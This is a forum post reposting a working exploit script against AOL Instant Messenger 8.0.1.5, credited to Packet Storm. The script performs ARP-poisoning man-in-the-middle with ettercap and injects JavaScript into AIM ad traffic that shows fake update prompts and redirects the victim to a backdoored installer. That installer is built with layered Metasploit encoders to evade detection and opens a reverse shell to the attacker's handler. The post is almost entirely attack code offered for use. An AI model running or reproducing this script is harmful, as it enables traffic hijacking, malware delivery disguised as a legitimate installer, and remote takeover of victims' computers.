Jump to content
Matt

AOL Instant Messenger 8.0.1.5 Binary Planting

By Matt, in Exploituri

Recommended Posts

Matt Newbie

Matt

Posted
Posted

Description : AOL Instant Messenger versions 8.0.1.5 and below suffer from a binary file planting vulnerability.

Author : Marshall Whittaker

Source : AOL Instant Messenger 8.0.1.5 Binary Planting ? Packet Storm

Code : 

#!/bin/bash

### AOL Instant Messenger 8.0.1.5 (Jul 2013) Exploit Windows XP/7 tested and working.
### Leverages binary file planting to My Documents via AIMs advertisement code.
### Little social engineering built in using javascript to try to get them to run the AIM_Install.exe.
### Starts a reverse shell back to your handler on 192.168.2.5:443 by default.

### Marshall Whittaker

ATTACKER="192.168.2.10";
VICTIM="192.168.2.5";
GATEWAY="192.168.2.1";
REVPORT="443";
PAYLOADSITE="https://dl.dropboxusercontent.com/s/dykenlhdobchjjv/AIM_Install.exe?token_hash=AAE2qGWSZAlAWJKepUu_2fP5UZfg-JTHktBGuu-I4BV34Q&dl=1";

mkdir ~/aimpwn;
echo "if (tcp.src == 80) {" > ~/aimpwn/aimpwn.filter;
echo "if (search(DATA.data, \"atwola\")) {" >> ~/aimpwn/aimpwn.filter;
echo "replace(\"_blank>\", \"_blank><script>alert('A new version of AOL Instant Messenger is available!');window.location = '$PAYLOADSITE'; setTimeout(function(){alert ('Navigate to your My Documents folder and start the installer by clicking AIM_Install and follow the steps.');}, 1000);</script>\");" >> ~/aimpwn/aimpwn.filter;
echo "msg(\"PWNT.\n\");" >> ~/aimpwn/aimpwn.filter;
echo "}" >> ~/aimpwn/aimpwn.filter;
echo "}" >> ~/aimpwn/aimpwn.filter;
etterfilter ~/aimpwn/aimpwn.filter -o ~/aimpwn/aimpwn.ef;
### wget section.
#wget http://download.newaol.com/aim/win/AIM_Install.exe -O ~/aimpwn/AIM_Install.exe;
cp ~/aimpwn/AIM_Install.exe /opt/metasploit/apps/pro/msf3/data/templates/;
msfpayload windows/shell/reverse_tcp LHOST=$ATTACKER LPORT=$REVPORT R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -x AIM_Install.exe -t exe -e x86/call4_dword_xor -c 2 -o ~/aimpwn/AIM_Install.exe;
### Uncomment wget section and put code to upload AIM_Install.exe to a site if you need to
### change ATTACKER IP or port.
ettercap -T -F ~/aimpwn/aimpwn.ef -q -M arp:remote /$GATEWAY/ /$VICTIM/ &
msfcli exploit/multi/handler payload=windows/shell/reverse_tcp lhost=$ATTACKER lport=$REVPORT E;

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...